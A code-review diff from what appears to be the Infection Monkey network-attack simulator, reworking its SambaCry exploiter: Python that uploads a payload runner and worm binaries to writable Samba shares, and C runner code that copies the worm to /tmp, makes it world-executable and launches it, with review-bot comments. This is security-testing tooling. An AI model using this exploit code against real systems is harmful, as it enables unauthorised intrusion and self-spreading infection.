Merge pull request #55 from guardicore/bugfix/fix-sambacry-for-user
Fix SambaCry not working for non-root user
commit
039cc1bd6c
|
@ -111,7 +111,7 @@ class Configuration(object):
|
||||||
# dropper config
|
# dropper config
|
||||||
###########################
|
###########################
|
||||||
|
|
||||||
dropper_try_move_first = sys.argv[0].endswith(".exe")
|
dropper_try_move_first = True
|
||||||
dropper_set_date = True
|
dropper_set_date = True
|
||||||
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
|
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
|
||||||
dropper_date_reference_path_linux = '/bin/sh'
|
dropper_date_reference_path_linux = '/bin/sh'
|
||||||
|
@ -260,22 +260,6 @@ class Configuration(object):
|
||||||
sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
|
sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
|
||||||
# Shares to not check if they're writable.
|
# Shares to not check if they're writable.
|
||||||
sambacry_shares_not_to_check = ["IPC$", "print$"]
|
sambacry_shares_not_to_check = ["IPC$", "print$"]
|
||||||
# Name of file which contains the monkey's commandline
|
|
||||||
sambacry_commandline_filename = "monkey_commandline.txt"
|
|
||||||
# Name of file which contains the runner's result
|
|
||||||
sambacry_runner_result_filename = "monkey_runner_result"
|
|
||||||
# SambaCry runner filename (32 bit)
|
|
||||||
sambacry_runner_filename_32 = "sc_monkey_runner32.so"
|
|
||||||
# SambaCry runner filename (64 bit)
|
|
||||||
sambacry_runner_filename_64 = "sc_monkey_runner64.so"
|
|
||||||
# Monkey filename on share (32 bit)
|
|
||||||
sambacry_monkey_filename_32 = "monkey32"
|
|
||||||
# Monkey filename on share (64 bit)
|
|
||||||
sambacry_monkey_filename_64 = "monkey64"
|
|
||||||
# Monkey copy filename on share (32 bit)
|
|
||||||
sambacry_monkey_copy_filename_32 = "monkey32_2"
|
|
||||||
# Monkey copy filename on share (64 bit)
|
|
||||||
sambacry_monkey_copy_filename_64 = "monkey64_2"
|
|
||||||
|
|
||||||
# system info collection
|
# system info collection
|
||||||
collect_system_info = True
|
collect_system_info = True
|
||||||
|
|
|
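Review bot: `dropper_try_move_first = True` on the new side of the first hunk replaces a platform-conditional value (`sys.argv[0].endswith(".exe")`) with an unconditional one, but neither the commit message nor a comment records why the Linux dropper should now try a move first; the example config makes the same flip (`"dropper_try_move_first": true`). Add a comment above the line stating the intent, e.g. `# Always try to move the dropper first (previously only for .exe builds): <reason>`, filling in the reason. If nothing else in this module still uses `sys` after the change, the import may be unused now; that cannot be confirmed from the hunk.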
@ -27,7 +27,7 @@
|
||||||
|
|
||||||
"kill_file_path_linux": "/var/run/monkey.not",
|
"kill_file_path_linux": "/var/run/monkey.not",
|
||||||
"kill_file_path_windows": "%windir%\\monkey.not",
|
"kill_file_path_windows": "%windir%\\monkey.not",
|
||||||
"dropper_try_move_first": false,
|
"dropper_try_move_first": true,
|
||||||
"exploiter_classes": [
|
"exploiter_classes": [
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
|
@ -70,14 +70,6 @@
|
||||||
"sambacry_trigger_timeout": 5,
|
"sambacry_trigger_timeout": 5,
|
||||||
"sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
|
"sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
|
||||||
"sambacry_shares_not_to_check": ["IPC$", "print$"],
|
"sambacry_shares_not_to_check": ["IPC$", "print$"],
|
||||||
"sambacry_commandline_filename": "monkey_commandline.txt",
|
|
||||||
"sambacry_runner_result_filename": "monkey_runner_result",
|
|
||||||
"sambacry_runner_filename_32": "sc_monkey_runner32.so",
|
|
||||||
"sambacry_runner_filename_64": "sc_monkey_runner64.so",
|
|
||||||
"sambacry_monkey_filename_32": "monkey32",
|
|
||||||
"sambacry_monkey_filename_64": "monkey64",
|
|
||||||
"sambacry_monkey_copy_filename_32": "monkey32_2",
|
|
||||||
"sambacry_monkey_copy_filename_64": "monkey64_2",
|
|
||||||
"local_network_scan": false,
|
"local_network_scan": false,
|
||||||
"tcp_scan_get_banner": true,
|
"tcp_scan_get_banner": true,
|
||||||
"tcp_scan_interval": 200,
|
"tcp_scan_interval": 200,
|
||||||
|
|
|
@ -33,6 +33,23 @@ class SambaCryExploiter(HostExploiter):
|
||||||
"""
|
"""
|
||||||
_target_os_type = ['linux']
|
_target_os_type = ['linux']
|
||||||
|
|
||||||
|
# Name of file which contains the monkey's commandline
|
||||||
|
SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
|
||||||
|
# Name of file which contains the runner's result
|
||||||
|
SAMBACRY_RUNNER_RESULT_FILENAME = "monkey_runner_result"
|
||||||
|
# SambaCry runner filename (32 bit)
|
||||||
|
SAMBACRY_RUNNER_FILENAME_32 = "sc_monkey_runner32.so"
|
||||||
|
# SambaCry runner filename (64 bit)
|
||||||
|
SAMBACRY_RUNNER_FILENAME_64 = "sc_monkey_runner64.so"
|
||||||
|
# Monkey filename on share (32 bit)
|
||||||
|
SAMBACRY_MONKEY_FILENAME_32 = "monkey32"
|
||||||
|
# Monkey filename on share (64 bit)
|
||||||
|
SAMBACRY_MONKEY_FILENAME_64 = "monkey64"
|
||||||
|
# Monkey copy filename on share (32 bit)
|
||||||
|
SAMBACRY_MONKEY_COPY_FILENAME_32 = "monkey32_2"
|
||||||
|
# Monkey copy filename on share (64 bit)
|
||||||
|
SAMBACRY_MONKEY_COPY_FILENAME_64 = "monkey64_2"
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
self._config = __import__('config').WormConfiguration
|
self._config = __import__('config').WormConfiguration
|
||||||
|
|
||||||
|
@ -97,10 +114,9 @@ class SambaCryExploiter(HostExploiter):
|
||||||
"""
|
"""
|
||||||
smb_client = self.connect_to_server(ip, creds)
|
smb_client = self.connect_to_server(ip, creds)
|
||||||
tree_id = smb_client.connectTree(share)
|
tree_id = smb_client.connectTree(share)
|
||||||
file_list = [self._config.sambacry_commandline_filename, self._config.sambacry_runner_result_filename,
|
file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
||||||
self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64,
|
self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64,
|
||||||
self._config.sambacry_monkey_filename_32, self._config.sambacry_monkey_filename_64,
|
self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64]
|
||||||
self._config.sambacry_monkey_copy_filename_32, self._config.sambacry_monkey_copy_filename_64]
|
|
||||||
|
|
||||||
for filename in file_list:
|
for filename in file_list:
|
||||||
try:
|
try:
|
||||||
|
@ -123,7 +139,7 @@ class SambaCryExploiter(HostExploiter):
|
||||||
tree_id = smb_client.connectTree(share)
|
tree_id = smb_client.connectTree(share)
|
||||||
file_content = None
|
file_content = None
|
||||||
try:
|
try:
|
||||||
file_id = smb_client.openFile(tree_id, "\\%s" % self._config.sambacry_runner_result_filename,
|
file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
||||||
desiredAccess=FILE_READ_DATA)
|
desiredAccess=FILE_READ_DATA)
|
||||||
file_content = smb_client.readFile(tree_id, file_id)
|
file_content = smb_client.readFile(tree_id, file_id)
|
||||||
smb_client.closeFile(tree_id, file_id)
|
smb_client.closeFile(tree_id, file_id)
|
||||||
|
@ -251,22 +267,22 @@ class SambaCryExploiter(HostExploiter):
|
||||||
|
|
||||||
with self.get_monkey_commandline_file(host, depth,
|
with self.get_monkey_commandline_file(host, depth,
|
||||||
self._config.dropper_target_path_linux) as monkey_commandline_file:
|
self._config.dropper_target_path_linux) as monkey_commandline_file:
|
||||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_commandline_filename, monkey_commandline_file.read)
|
smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read)
|
||||||
|
|
||||||
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
|
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_32, monkey_runner_bin_file.read)
|
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read)
|
||||||
|
|
||||||
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
|
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_64, monkey_runner_bin_file.read)
|
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read)
|
||||||
|
|
||||||
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
|
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
|
||||||
monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
|
monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
|
||||||
|
|
||||||
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
|
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_32, monkey_bin_file.read)
|
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read)
|
||||||
|
|
||||||
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
|
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_64, monkey_bin_file.read)
|
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
|
||||||
|
|
||||||
smb_client.disconnectTree(tree_id)
|
smb_client.disconnectTree(tree_id)
|
||||||
|
|
||||||
|
@ -323,14 +339,14 @@ class SambaCryExploiter(HostExploiter):
|
||||||
:return: Array of possible full paths to the module.
|
:return: Array of possible full paths to the module.
|
||||||
"""
|
"""
|
||||||
sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
|
sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
|
||||||
file_names = [self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64]
|
file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64]
|
||||||
return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
|
return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
|
||||||
|
|
||||||
def get_monkey_runner_bin_file(self, is_32bit):
|
def get_monkey_runner_bin_file(self, is_32bit):
|
||||||
if is_32bit:
|
if is_32bit:
|
||||||
return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_32), "rb")
|
return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_32), "rb")
|
||||||
else:
|
else:
|
||||||
return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_64), "rb")
|
return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_64), "rb")
|
||||||
|
|
||||||
def get_monkey_commandline_file(self, host, depth, location):
|
def get_monkey_commandline_file(self, host, depth, location):
|
||||||
return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location))
|
return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location))
|
||||||
|
|
|
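Review bot: The new class constants in the first hunk (`SAMBACRY_COMMANDLINE_FILENAME`, `SAMBACRY_RUNNER_RESULT_FILENAME`, the runner and monkey filenames) duplicate string literals compiled into sc_monkey_runner.c (`COMMANDLINE_FILENAME`, `RUNNER_RESULT_FILENAME`, `RUNNER_FILENAME`, `MONKEY_NAME`), and the two sets must agree byte for byte; taking them out of the user-editable config is the right call, but add a comment above the block, e.g. `# Must match the constants compiled into sc_monkey_runner.c`. In the second hunk `file_list` drops the `monkey32_2`/`monkey64_2` copy names, consistent with the runner now writing its copy under /tmp instead of onto the share; nothing visible in this diff removes that copy afterwards, so either document that the monkey deletes itself or note the leftover in the docstring of the enclosing cleanup method, which starts outside the hunk.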
@ -1,9 +1,9 @@
|
||||||
#!/usr/bin/env bash
|
#!/usr/bin/env bash
|
||||||
gcc -c -Wall -Werror -fpic -m64 sc_monkey_runner.c
|
gcc -c -Wall -Werror -fpic -m64 sc_monkey_runner.c
|
||||||
gcc -shared -m64 -o sc_monkey_runner_64.so sc_monkey_runner.o
|
gcc -shared -m64 -o sc_monkey_runner64.so sc_monkey_runner.o
|
||||||
rm sc_monkey_runner.o
|
rm sc_monkey_runner.o
|
||||||
strip sc_monkey_runner_64.so
|
strip sc_monkey_runner64.so
|
||||||
gcc -c -Wall -Werror -fpic -m32 sc_monkey_runner.c
|
gcc -c -Wall -Werror -fpic -m32 sc_monkey_runner.c
|
||||||
gcc -shared -m32 -o sc_monkey_runner_32.so sc_monkey_runner.o
|
gcc -shared -m32 -o sc_monkey_runner32.so sc_monkey_runner.o
|
||||||
rm sc_monkey_runner.o
|
rm sc_monkey_runner.o
|
||||||
strip sc_monkey_runner_32.so
|
strip sc_monkey_runner32.so
|
|
@ -22,16 +22,16 @@ int samba_init_module(void)
|
||||||
#ifdef ARCH_IS_64
|
#ifdef ARCH_IS_64
|
||||||
const char RUNNER_FILENAME[] = "sc_monkey_runner64.so";
|
const char RUNNER_FILENAME[] = "sc_monkey_runner64.so";
|
||||||
const char MONKEY_NAME[] = "monkey64";
|
const char MONKEY_NAME[] = "monkey64";
|
||||||
const char MONKEY_COPY_NAME[] = "monkey64_2";
|
|
||||||
#else
|
#else
|
||||||
const char RUNNER_FILENAME[] = "sc_monkey_runner32.so";
|
const char RUNNER_FILENAME[] = "sc_monkey_runner32.so";
|
||||||
const char MONKEY_NAME[] = "monkey32";
|
const char MONKEY_NAME[] = "monkey32";
|
||||||
const char MONKEY_COPY_NAME[] = "monkey32_2";
|
|
||||||
#endif
|
#endif
|
||||||
const char RUNNER_RESULT_FILENAME[] = "monkey_runner_result";
|
const char RUNNER_RESULT_FILENAME[] = "monkey_runner_result";
|
||||||
const char COMMANDLINE_FILENAME[] = "monkey_commandline.txt";
|
const char COMMANDLINE_FILENAME[] = "monkey_commandline.txt";
|
||||||
const int ACCESS_MODE = 0777;
|
const int ACCESS_MODE = 0777;
|
||||||
const char RUN_MONKEY_CMD[] = "sudo ./";
|
const char RUN_MONKEY_CMD[] = "./";
|
||||||
|
const char MONKEY_DEST_FOLDER[] = "/tmp";
|
||||||
|
const char MONKEY_DEST_NAME[] = "monkey";
|
||||||
|
|
||||||
int found = 0;
|
int found = 0;
|
||||||
char modulePathLine[LINE_MAX_LENGTH] = {'\0'};
|
char modulePathLine[LINE_MAX_LENGTH] = {'\0'};
|
||||||
|
@ -102,7 +102,7 @@ int samba_init_module(void)
|
||||||
|
|
||||||
// Build commandline
|
// Build commandline
|
||||||
strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
|
strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
|
||||||
strncat(commandline, MONKEY_COPY_NAME, sizeof(MONKEY_COPY_NAME) - 1);
|
strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1);
|
||||||
strncat(commandline, " ", 1);
|
strncat(commandline, " ", 1);
|
||||||
|
|
||||||
fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
|
fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
|
||||||
|
@ -133,7 +133,12 @@ int samba_init_module(void)
|
||||||
fread(monkeyBinary, 1, monkeySize, pFile);
|
fread(monkeyBinary, 1, monkeySize, pFile);
|
||||||
fclose(pFile);
|
fclose(pFile);
|
||||||
|
|
||||||
pFile = fopen(MONKEY_COPY_NAME, "wb");
|
if (0 != chdir(MONKEY_DEST_FOLDER))
|
||||||
|
{
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
pFile = fopen(MONKEY_DEST_NAME, "wb");
|
||||||
if (NULL == pFile)
|
if (NULL == pFile)
|
||||||
{
|
{
|
||||||
free(monkeyBinary);
|
free(monkeyBinary);
|
||||||
|
@ -144,7 +149,7 @@ int samba_init_module(void)
|
||||||
free(monkeyBinary);
|
free(monkeyBinary);
|
||||||
|
|
||||||
// Change monkey permissions
|
// Change monkey permissions
|
||||||
if (0 != chmod(MONKEY_COPY_NAME, ACCESS_MODE))
|
if (0 != chmod(MONKEY_DEST_NAME, ACCESS_MODE))
|
||||||
{
|
{
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
|
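Review bot: The new early return in the third hunk, `if (0 != chdir(MONKEY_DEST_FOLDER)) { return 0; }`, leaks `monkeyBinary`: the buffer was filled by the `fread` a few lines above and the adjacent `NULL == pFile` branch frees it, so this branch should too — `if (0 != chdir(MONKEY_DEST_FOLDER)) { free(monkeyBinary); return 0; }`. Separately, the copy is now written to the fixed path `/tmp/monkey` and `chmod`'d to `ACCESS_MODE` (0777) before being executed, so any local user can pre-create or replace that file between the write and the run; a per-run unique directory (e.g. `mkdtemp`) and a mode without group/other write bits would remove that window. samba_init_module starts before the first hunk of this file and continues past the last.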
@ -587,46 +587,6 @@ SCHEMA = {
|
||||||
"IPC$", "print$"
|
"IPC$", "print$"
|
||||||
],
|
],
|
||||||
"description": "These shares won't be checked when exploiting with SambaCry"
|
"description": "These shares won't be checked when exploiting with SambaCry"
|
||||||
},
|
|
||||||
"sambacry_commandline_filename": {
|
|
||||||
"title": "SambaCry commandline filename",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey_commandline.txt",
|
|
||||||
},
|
|
||||||
"sambacry_runner_result_filename": {
|
|
||||||
"title": "SambaCry runner result filename",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey_runner_result",
|
|
||||||
},
|
|
||||||
"sambacry_runner_filename_32": {
|
|
||||||
"title": "SambaCry runner filename (32 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "sc_monkey_runner32.so",
|
|
||||||
},
|
|
||||||
"sambacry_runner_filename_64": {
|
|
||||||
"title": "SambaCry runner filename (64 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "sc_monkey_runner64.so",
|
|
||||||
},
|
|
||||||
"sambacry_monkey_filename_32": {
|
|
||||||
"title": "SambaCry monkey filename (32 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey32",
|
|
||||||
},
|
|
||||||
"sambacry_monkey_filename_64": {
|
|
||||||
"title": "SambaCry monkey filename (64 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey64",
|
|
||||||
},
|
|
||||||
"sambacry_monkey_copy_filename_32": {
|
|
||||||
"title": "SambaCry monkey copy filename (32 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey32_2",
|
|
||||||
},
|
|
||||||
"sambacry_monkey_copy_filename_64": {
|
|
||||||
"title": "SambaCry monkey copy filename (64 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey64_2",
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
|
|